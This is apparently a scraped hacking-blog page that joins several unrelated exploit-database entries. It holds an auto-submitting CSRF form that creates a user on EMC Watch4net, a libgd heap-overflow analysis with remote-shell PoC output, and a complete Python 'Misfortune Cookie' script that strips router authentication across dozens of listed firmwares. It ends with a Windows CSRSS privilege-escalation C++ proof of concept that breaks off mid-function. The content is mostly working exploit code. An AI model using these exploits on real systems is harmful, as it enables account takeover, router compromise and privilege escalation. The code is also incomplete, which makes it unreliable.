<!--
EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection
Abstract
It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
Affected versions
Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities.
See also
- ESA-2016-039
- CVE-2016-0891
Fix
EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers.
Introduction
EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite.
EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
Details
Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing.
The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.
-->
<html>
<body>
<form action="http://<target>:58080/APG/admin/form" method="POST">
<input type="hidden" name="form-id" value="UserForm" />
<input type="hidden" name="ident" value="" />
<input type="hidden" name="old" value="" />
<input type="hidden" name="name" value="CSRF" />
<input type="hidden" name="password" value="1" />
<input type="hidden" name="confirm" value="1" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="first-name" value="Han" />
<input type="hidden" name="last-name" value="Sahin" />
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="role" value="user" />
<input type="hidden" name="profile" value="0" />
<input type="hidden" name="user-roles" value="5" />
<input type="hidden" name="user-roles" value="1" />
<input type="hidden" name="user-roles" value="3" />
<input type="hidden" name="user-roles" value="4" />
<input type="hidden" name="user-roles" value="2" />
<input type="hidden" name="user-roles" value="6" />
<input type="hidden" name="filter" value="" />
<input type="hidden" name="custom" value="true" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863287226
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Overview
========
libgd [1] is an open-source image library. It is perhaps primarily used
by the PHP project. It has been bundled with the default installation
of PHP since version 4.3 [2].
A signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which
may result in a heap overflow when processing compressed gd2 data.
Details
=======
4 bytes representing the chunk index size is stored in a signed integer,
chunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:
libgd-2.1.1/src/gd_gd2.c:
,----
| 53 typedef struct {
| 54 int offset;
| 55 int size;
| 56 }
| 57 t_chunk_info;
`----
libgd-2.1.1/src/gd_gd2.c:
,----
| 65 static int
| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,
| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,
| 68 t_chunk_info ** chunkIdx)
| 69 {
| ...
| 73 t_chunk_info *cidx;
| ...
| 155 if (gd2_compressed (*fmt)) {
| ...
| 163 for (i = 0; i < nc; i++) {
| ...
| 167 if (gdGetInt (&cidx[i].size, in) != 1) {
| 168 goto fail2;
| 169 };
| 170 };
| 171 *chunkIdx = cidx;
| 172 };
| ...
| 181 }
`----
`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then
allocates memory for the compressed data based on the value of the
largest chunk size:
libgd-2.1.1/src/gd_gd2.c:
,----
| 371|637 if (gd2_compressed (fmt)) {
| 372|638 /* Find the maximum compressed chunk size. */
| 373|639 compMax = 0;
| 374|640 for (i = 0; (i < nc); i++) {
| 375|641 if (chunkIdx[i].size > compMax) {
| 376|642 compMax = chunkIdx[i].size;
| 377|643 };
| 378|644 };
| 379|645 compMax++;
| ...|...
| 387|656 compBuf = gdCalloc (compMax, 1);
| ...|...
| 393|661 };
`----
A size of <= 0 results in `compMax' retaining its initial value during
the loop, followed by it being incremented to 1. Since `compMax' is
used as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation
for `compBuf'.
This is followed by compressed data being read to `compBuf' based on the
current (potentially negative) chunk size:
libgd-2.1.1/src/gd_gd2.c:
,----
| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)
| 340 {
| ...
| 413 if (gd2_compressed (fmt)) {
| 414
| 415 chunkLen = chunkMax;
| 416
| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
| 418 compBuf,
| 419 chunkIdx[chunkNum].size,
| 420 (char *) chunkBuf, &chunkLen, in)) {
| 421 GD2_DBG (printf ("Error reading comproessed chunk\n"));
| 422 goto fail;
| 423 };
| 424
| 425 chunkPos = 0;
| 426 };
| ...
| 501 }
`----
libgd-2.1.1/src/gd_gd2.c:
,----
| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)
| 586 {
| ...
| 713 if (!gd2_compressed (fmt)) {
| ...
| 731 } else {
| 732 chunkNum = cx + cy * ncx;
| 733
| 734 chunkLen = chunkMax;
| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
| 736 compBuf,
| 737 chunkIdx[chunkNum].size,
| 738 (char *) chunkBuf, &chunkLen, in)) {
| 739 printf ("Error reading comproessed chunk\n");
| 740 goto fail2;
| 741 };
| ...
| 746 };
| ...
| 815 }
`----
The size is subsequently interpreted as a size_t by `fread()' or
`memcpy()', depending on how the image is read:
libgd-2.1.1/src/gd_gd2.c:
,----
| 221 static int
| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,
| 223 uLongf * chunkLen, gdIOCtx * in)
| 224 {
| ...
| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {
| 237 return FALSE;
| 238 };
| ...
| 251 }
`----
libgd-2.1.1/src/gd_io.c:
,----
| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)
| 212 {
| 213 return (ctx->getBuf)(ctx, buf, size);
| 214 }
`----
For file contexts:
libgd-2.1.1/src/gd_io_file.c:
,----
| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)
| 53 {
| ...
| 67 ctx->ctx.getBuf = fileGetbuf;
| ...
| 76 }
| ...
| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)
| 93 {
| 94 fileIOCtx *fctx;
| 95 fctx = (fileIOCtx *)ctx;
| 96
| 97 return (fread(buf, 1, size, fctx->f));
| 98 }
`----
And for dynamic contexts:
libgd-2.1.1/src/gd_io_dp.c:
,----
| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)
| 75 {
| ...
| 95 ctx->ctx.getBuf = dynamicGetbuf;
| ...
| 104 }
| ...
| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)
| 257 {
| ...
| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);
| ...
| 284 }
`----
PoC
===
Against Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:
,----
| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
| [*] this may take a while
| [*] offset 912 of 10000...
| [+] connected to 1.2.3.4:5555
| id
| uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
| uname -a
| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
| 2016 x86_64 x86_64 x86_64 GNU/Linux
|
| dpkg -l|grep -E "php5-(fpm|gd)"
| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...
| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...
|
| cat upload.php
| <?php
| imagecreatefromgd2($_FILES["file"]["tmp_name"]);
| ?>
`----
Solution
========
This bug has been fixed in git HEAD [4].
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39736.zip
Footnotes
_________
[1] [http://libgd.org/]
[2] [https://en.wikipedia.org/wiki/Libgd]
[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]
[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]
# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover
# Date: 17/4/2016
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf
# Versions affected: RomPager <= 4.34 (specifically 4.07)
# Tested on : firmwares which are set as tested in the targets list
# Category: Remote Exploit
# Usage: ./exploit.py url
# Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040
# Author: Milad Doorbash
# Email: milad.doorbash@gmail.com
# Social: @doorbash
# Blog: http://doorbash.ir
# Many Thanks to :
# Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)
# Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)
# Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)
# Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)
# Disclaimer :
# This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.
# Author takes no responsibility for any actions with provided informations or codes.
# Description :
# Misfortune Cookie is a critical vulnerability that allows an intruder to remotely
# take over an Internet router and use it to attack home and business networks.With a few magic
# cookies added to your request you bypass any authentication and browse the configuration
# interface as admin, from any open port.
import requests
import sys
import time
MODE_TEST = 100000
MODE_BRUTE_FORCE = 100001
if len(sys.argv) == 1:
print "usage: python " + sys.argv[0] + " url [enable]"
print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"
exit()
url = str(sys.argv[1])
auth_byte = '\x00'
s = requests.Session()
if len(sys.argv) == 3:
if str(sys.argv[2]) == 'enable':
auth_byte = '\x01' # enable authenticaion again
else:
print "usage: python " + sys.argv[0] + " url [enable]"
exit()
targets = [
["Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79 # tested
["Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ----------
["Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ----------
["Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad # ----------
["Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5 # ----------
["Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1 # ----------
["Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51 # ----------
["Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51 # tested
["Billion BiPAC 5200S 2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109 # ----------
["Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d # ----------
["Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5 # ----------
["D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01 # tested
["D-Link DSL-2600U Z1 DSL-2600U HWZ1",107366496,13], # 0x8040637d # ----------
["D-Link DSL-2600U Z2 V1.08_ras",107360133,20], # 0x803389B0 # ----------
["TP-Link TD-8616 V2 TD-8616_v2_080513",107371483,21], # 0x80397055 # ----------
["TP-Link TD-8816 V4 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8816 V4 TD-8816_V4_100524",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8816 V5 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8816 V5 TD-8816_V5_100524",107369790,17], # 0x803ae0b1 # tested
["TP-Link TD-8816 V5 TD-8816_V5_100903",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8816 V6 TD-8816_V6_100907",107371426,17], # 0x803c6e09 # ----------
["TP-Link TD-8816 V7 TD-8816_V7_111103",107371161,1], # 0x803e1bd5 # ----------
["TP-Link TD-8816 V7 TD-8816_V7_130204",107370211,5], # 0x80400c85 # ----------
["TP-Link TD-8817 V5 TD-8817_V5_100524",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8817 V5 TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8817 V5 TD-8817_V5_100903",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8817 V6 TD-8817_V6_100907",107369788,1], # 0x803b6e09 # ----------
["TP-Link TD-8817 V6 TD-8817_V6_101221",107369788,1], # 0x803b6e09 # ----------
["TP-Link TD-8817 V7 TD-8817_V7_110826",107369522,25], # 0x803d1bd5 # ----------
["TP-Link TD-8817 V7 TD-8817_V7_130217",107369316,21], # 0x80407625 # ----------
["TP-Link TD-8817 V7 TD-8817_v7_120509",107369321,9], # 0x803fbcc5 # tested
["TP-Link TD-8817 V8 TD-8817_V8_140311",107351277,20], # 0x8024E148 # Grant Willcox
["TP-Link TD-8820 V3 TD-8820_V3_091223",107369768,17], # 0x80397E69 # Chan
["TP-Link TD-8840T V1 TD-8840T_080520",107369845,5], # 0x80387055 # ----------
["TP-Link TD-8840T V2 TD-8840T_V2_100525",107369790,17], # 0x803ae0b1 # tested
["TP-Link TD-8840T V2 TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1 # ----------
["TP-Link TD-8840T V2 TD-8840T_v2_090609",107369570,1], # 0x803c65d5 # ----------
["TP-Link TD-8840T V3 TD-8840T_V3_101208",107369766,17], #0x803c3e89 # tested
["TP-Link TD-8840T V3 TD-8840T_V3_110221",107369764,5], # 0x803d1a09 # ----------
["TP-Link TD-8840T V3 TD-8840T_V3_120531",107369688,17], # 0x803fed35 # ----------
["TP-Link TD-W8101G V1 TD-W8101G_090107",107367772,37], # 0x803bf701 # ----------
["TP-Link TD-W8101G V1 TD-W8101G_090107",107367808,21], # 0x803e5b6d # ----------
["TP-Link TD-W8101G V2 TD-W8101G_V2_100819",107367751,21], # 0x803dc701 # ----------
["TP-Link TD-W8101G V2 TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829 # ----------
["TP-Link TD-W8101G V2 TD-W8101G_V2_101101",107367749,13], # 0x803e1829 # ----------
["TP-Link TD-W8101G V3 TD-W8101G_V3_110119",107367765,25], # 0x804bb941 # ----------
["TP-Link TD-W8101G V3 TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9 # ----------
["TP-Link TD-W8101G V3 TD-W8101G_V3_120604",107365835,1], # 0x804f16a9 # ----------
["TP-Link TD-W8151N V3 TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4 # tested
["TP-Link TD-W8901G V1 TD-W8901G_080522",107367787,21], # 0x803AB30D # Piotr Bania
["TP-Link TD-W8901G V1,2 TD-W8901G_080522",107368013,5], # 0x803AB30D # ----------
["TP-Link TD-W8901G V2 TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D # ----------
["TP-Link TD-W8901G V3 TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335 # tested
["TP-Link TD-W8901G V3 TD-W8901G_V3_100603",107367751,21], # 0x803DC701 # chan
["TP-Link TD-W8901G V3 TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701 # tested
["TP-Link TD-W8901G V3 TD-W8901G_V3_100901",107367749,13], # 0x803E1829 # tested
["TP-Link TD-W8901G V6 TD-W8901G_V6_110119",107367765,25], # 0x804BB941 # Chan
["TP-Link TD-W8901G V6 TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9 # Chan
["TP-Link TD-W8901G V6 TD-W8901G_V6_120418",107365835,1], # 0x804F16A9 # ----------
["TP-Link TD-W8901G V6 TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9 # ----------
["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9 # ----------
["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100820",107369393,21], # 0x803f1719 # ----------
["TP-Link TD-W8901N V1 TD-W8901N v1_111211",107353880,0], # 0x8034FF94 # cawan Chui
["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61 # tested
["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9 # ----------
["TP-Link TD-W8951ND V1 TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9 # ----------
["TP-Link TD-W8951ND V3 TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189 # ----------
["TP-Link TD-W8951ND V3 TD-W8951ND_V3_110721",107366743,21], # 0x804ee049 # ----------
["TP-Link TD-W8951ND V3 TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189 # ----------
["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120511",107364759,25], # 0x80523979 # tested
["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120607",107364759,13], # 0x80524A91 # tested
["TP-Link TD-W8951ND V4 TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859 # tested
["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1 # tested
["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1 # ----------
["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120319",107367629,21], # 0x80531859 # ----------
["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120823",107366421,13], # 0x80542e59 # ----------
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61 # tested
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61 # ----------
["TP-Link TD-W8961ND V1 TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9 # ----------
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9 # ----------
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9 # ----------
["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1 # ----------
["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4 # ----------
["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120830",107353414,36], # 0x803605B4 # ----------
["ZyXEL P-660R-T3 V3 3.40(BOQ.0)C0",107369567,21], # 0x803db071 # tested
["ZyXEL P-660RU-T3 V3 3.40(BJR.0)C0",107369567,21], # 0x803db071 # ----------
# *---------- means data for this firmware is obtained from other tested firmwares.
# if you tested on your devices report to me so i can change them to tested state.
# don't forget to mention your device model and full firmware version in your reports.
# I could not gather information for every vulnerable firmwares since some vendors has removed
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.
# if you want to add missing firmwares data to list you can do it by reading blog posts
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me
# for any question or further information.
]
def request(num,n,data):
try:
print "\nConnecting to: " + url + "\n"
s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})
r = s.get(url)
print str(r.status_code) + "\n"
for i in r.headers:
print i + ": " + r.headers[i]
return [r.status_code,r.text]
except Exception, e:
return 1000
def printMenu():
print """
__ __ _ __ _
| \/ (_)___ / _| ___ _ __| |_ _ _ _ __ ___
| |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \
| | | | \__ \ _| (_) | | | |_| |_| | | | | __/
|_| |_|_|___/_| \___/|_| \__|\__,_|_| |_|\___|
____ _ _ _____ _ _ _
/ ___|___ ___ | | _(_) ___ | ____|_ ___ __ | | ___ (_) |_
| | / _ \ / _ \| |/ / |/ _ \ | _| \ \/ / '_ \| |/ _ \| | __|
| |__| (_) | (_) | <| | __/ | |___ > <| |_) | | (_) | | |_
\____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
----------------------------------------------------------------------------
"""
for k,i in enumerate(targets):
print str(k+1) + "- " + i[0]
print """
0- Not sure just try them all! (may cause reboot)
T- Test misfortune cookie vulnerablity against target
B- BruteForce to find auth-remover cookie (may cause reboot)
"""
c = 0
while True:
selection = raw_input("select a target: ")
if selection == "T":
return MODE_TEST
elif selection == "B":
return MODE_BRUTE_FORCE
c = int(selection)
if c <= len(targets):
break
else:
print "bad input try again"
return c - 1
def bruteforce():
for i in range(107364000,107380000):
for j in range(0,40):
print "testing " + str(i) + " , " + str(j)
result = request(i,j,"\x00")[0]
if result <= 302:
print "YEAHHH!!!!"
print str(i) + " , " + str(j) + " is the answer!"
return
elif result == 1000:
time.sleep(60)
def exploit():
c = printMenu()
if c < 0:
for k,i in enumerate(targets):
print "testing #" + str(k+1) + " ..."
result = request(i[1],i[2],auth_byte)[0]
if result == 1000:
print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"
time.sleep(60)
elif result <= 302:
print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
break # some routers always return 200 (for custom login page). so maybe we should comment this line
else:
print "\n[!] Failed."
else:
if c == MODE_TEST:
if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:
print "\n[!] Target is vulnerable"
else:
print "\n[!] Target is not vulnerable"
elif c == MODE_BRUTE_FORCE:
bruteforce()
elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:
print "\n[!] Failed."
else:
print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
exploit()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=692
Windows: CSRSS BaseSrvCheckVDM Session 0 Process Creation EoP
Platform: Windows 8.1, not tested on Windows 10 or 7
Class: Elevation of Privilege
Summary:
The CSRSS BaseSrv RPC call BaseSrvCheckVDM allows you to create a new process with the anonymous token, which results on a new process in session 0 which can be abused to elevate privileges.
Description:
CSRSS/basesrv.dll has a RPC method, BaseSrvCheckVDM, which checks whether the Virtual DOS Machine is installed and enabled. On Windows 8 and above the VDM is off by default (on 32 bit Windows) so if disabled CSRSS tries to be helpful and spawns a process on the desktop which asks the user to install the VDM. The token used for the new process comes from the impersonation token of the caller. So by impersonating the anonymous token before the call to CsrClientCallServer we can get CSRSS to use that as the primary token. As the anonymous token has a Session ID of 0 this means it creates a new process in session 0 (because nothing else changes the session ID).
Now this in itself wouldn’t typically be exploitable, there are many places with similar behaviour (for example Win32_Process::Create in WMI) but most places impersonate the primary token it’s going to set over the call to CreateProcessAsUser. If it did this then for most scenarios the call to NtCreateUserProcess would fail with STATUS_ACCESS_DENIED as the anonymous token can’t access much in the way of files, unless of course the default configuration is changed to add the Everyone group to the token.
However in this case the code in BaseSrvLaunchProcess instead calls a method, BasepImpersonateClientProcess which opens the calling process’s primary token, creates an impersonation token and impersonates that. This means that the call is created with the security context of the current user which _can_ access arbitrary files. So BaseSrvLaunchProcess does roughly:
CsrImpersonateClient(0);
OpenThreadToken(..., &hToken);
DuplicateTokenEx(hToken, …, TokenPrimary, &hPrimaryToken); <- The anonymous token
RevertToSelf();
OpenProcessToken(hCallerProcess, &hToken);
DuplicateToken(hToken, SecurityImpersonation, &hImpToken);
SetThreadToken(hThread, hImpTOken); <- This impersonates the user
NtCreateUserProcess(...); <- Succeeds, creates process as Anonymous Logon in Session 0.
Of course this new process in session 0 can’t do a lot due to it being run as the Anonymous Logon user, and in fact will die pretty quickly during initialization. However we can at least get a handle to it before it dies. At least if you have multiple CPUs it should be possible to win the race to open it and suspend the process before death (in fact for later exploitation you might not need it alive at all, just a handle is sufficient). Now you could patch out the LDR calls and allow the process to initialize, but it would be more useful to have a process as the current user with the session ID 0.
One way we can do this is exploiting CreateProcessWithLogonW. If we use the LOGON_NETCREDENTIALS_ONLY flag then seclogon will create a new process based on the current callers token (which is the current user) but the service takes a Process ID value which indicates the parent process. It’s the parent process’s session ID which is used to determine what session the new token should really be in. So if we call seclogon, passing the PID of the anonymous token process but call it from the current user we’ll get an arbitrary process created with the current user token but in session 0. There’s some fun to do with default DACLs and the like to make this all work but that’s an implementation detail.
The final question is is this useful? Session 0 has a special place in the security model on Windows, even more so since Vista with Session 0 isolation. For example because we’re in session 0 we can drop arbitrarily named Sections and Symbolic Links in \BaseNamedObjects which normally requires SeCreateGlobalPrivilege this might allow a low privilege user to interact with system services which no longer expect this kind of attack vector. Also there’s probably other places which check for Session ID 0 to make some sort of trust decision.
Note even though the VDM isn’t present on x64 builds of Windows these CSRSS RPC calls still seem to exist and so should be vulnerable.
From a fixing perspective I guess CSRSS should consistently use the same token for the primary and the impersonation. In the more general case I wonder if the anonymous token should have its Session ID set to the caller’s session ID when it impersonates to to prevent this scenario in the first place, but I bet there’s some difficult edge cases on that.
Proof of Concept:
I’ve provided a PoC as a C++ source code file. You need to compile it with VC++. This must be run on Windows 8.1 32 bit version as I abuse the existing code in CreateProcess to call CSRSS when trying to create a 16bit DOS executable. This is rather than going to the effort of reverse engineering the call. However if you did that it should work in a similar way on 64 bit windows. Also you MUST run it on a multi-processor system, you might not be able to win the race on a single core system, but I’ve not verified that. If it seems to get stuck and no new process is created it might have lost the race, try it again. Also try rebooting, I’ve observed the control panel sometimes not being created for some reason which a reboot tends to fix.
1) Compile the C++ source code file.
2) Execute the poc executable as a normal user. This will not work from low IL.
3) If successful a copy of notepad should be created (suspended though as it’ll crash trying to access the Window Station if it starts). You can create a process which will survive to add stuff to things like BaseNamedObjects but I’ve not provided such an executable.
Expected Result:
The call to BaseSrvCheckVDM should fail to create the control panel process.
Observed Result:
A new copy of notepad is created suspended. You can observe that it runs as the current user’s token but in Session ID 0.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <sddl.h>
extern "C" {
NTSTATUS NTAPI NtGetNextProcess(
HANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
ULONG HandleAttributes,
ULONG Flags,
PHANDLE NewProcessHandle);
NTSTATUS NTAPI NtSuspendProcess(HANDLE ProcessHandle);
}
HANDLE g_hProcess = nullptr;
void SetProcessId(DWORD pid) {
__asm {
mov edx, [pid];
mov eax, fs:[0x18]
mov [eax+0x20], edx
}
}
DWORD CALLBACK CaptureAndSuspendProcess(LPVOID)
{
ImpersonateAnonymousToken(GetCurrentThread());
while (NtGetNextProcess(nullptr, MAXIMUM_ALLOWED, 0, 0, &g_hProcess) != 0)
{
}
NTSTATUS status = NtSuspendProcess(g_hProcess);
printf("Suspended process: %08X %p %d\n", status, g_hProcess, GetProcessId(g_hProcess));
RevertToSelf();
SetProcessId(GetProcessId(g_hProcess));
WCHAR cmdline[] = L"notepad.exe";
STARTUPINFO startInfo = {};
PROCESS_INFORMATION procInfo = {};
startInfo.cb = sizeof(startInfo);
if (CreateProcessWithLogonW(L"user", L"domain", L"password", LOGON_NETCREDENTIALS_ONLY,
nullptr, cmdline, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
{
printf("Created process %d\n", procInfo.dwProcessId);
}
else
{
printf("Create error: %d\n", GetLastError());
}
TerminateProcess(g_hProcess, 0);
ExitProcess(0);
return 0;
}
HANDLE GetAnonymousToken()
{
ImpersonateAnonymousToken(GetCurrentThread());
HANDLE hToken;
OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken);
RevertToSelf();
PSECURITY_DESCRIPTOR pSD;
ULONG sd_length;
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(L"D:(A;;GA;;;WD)(A;;GA;;;AN)", SDDL_REVISION_1, &pSD, &sd_length))
{
printf("Error converting SDDL: %d\n", GetLastError());
exit(1);
}
TOKEN_DEFAULT_DACL dacl;
BOOL bPresent;
BOOL bDefaulted;
PACL pDACL;
GetSecurityDescriptorDacl(pSD, &bPresent, &pDACL, &bDefaulted);
dacl.DefaultDacl = pDACL;
if (!SetTokenInformation(hToken, TokenDefaultDacl, &dacl, sizeof(dacl)))
{
printf("Error setting default DACL: %d\n", GetLastError());
exit(1);
}
return hToken;
}
#define PtrFromRva( base, rva ) ( ( ( PBYTE ) base ) + rva )
/*++
Routine Description:
Replace the function pointer in a module's IAT.
Parameters:
Module - Module to use IAT from.
ImportedModuleName - Name of imported DLL from which
function is imported.
ImportedProcName - Name of imported function.
AlternateProc - Function to be written to IAT.
OldProc - Original function.
Return Value:
S_OK on success.
(any HRESULT) on failure.
--*/
HRESULT PatchIat(
__in HMODULE Module,
__in PSTR ImportedModuleName,
__in PSTR ImportedProcName,
__in PVOID AlternateProc,
__out_opt PVOID *OldProc
)
{
PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)Module;
PIMAGE_NT_HEADERS NtHeader;
PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor;
UINT Index;
NtHeader = (PIMAGE_NT_HEADERS)
PtrFromRva(DosHeader, DosHeader->e_lfanew);
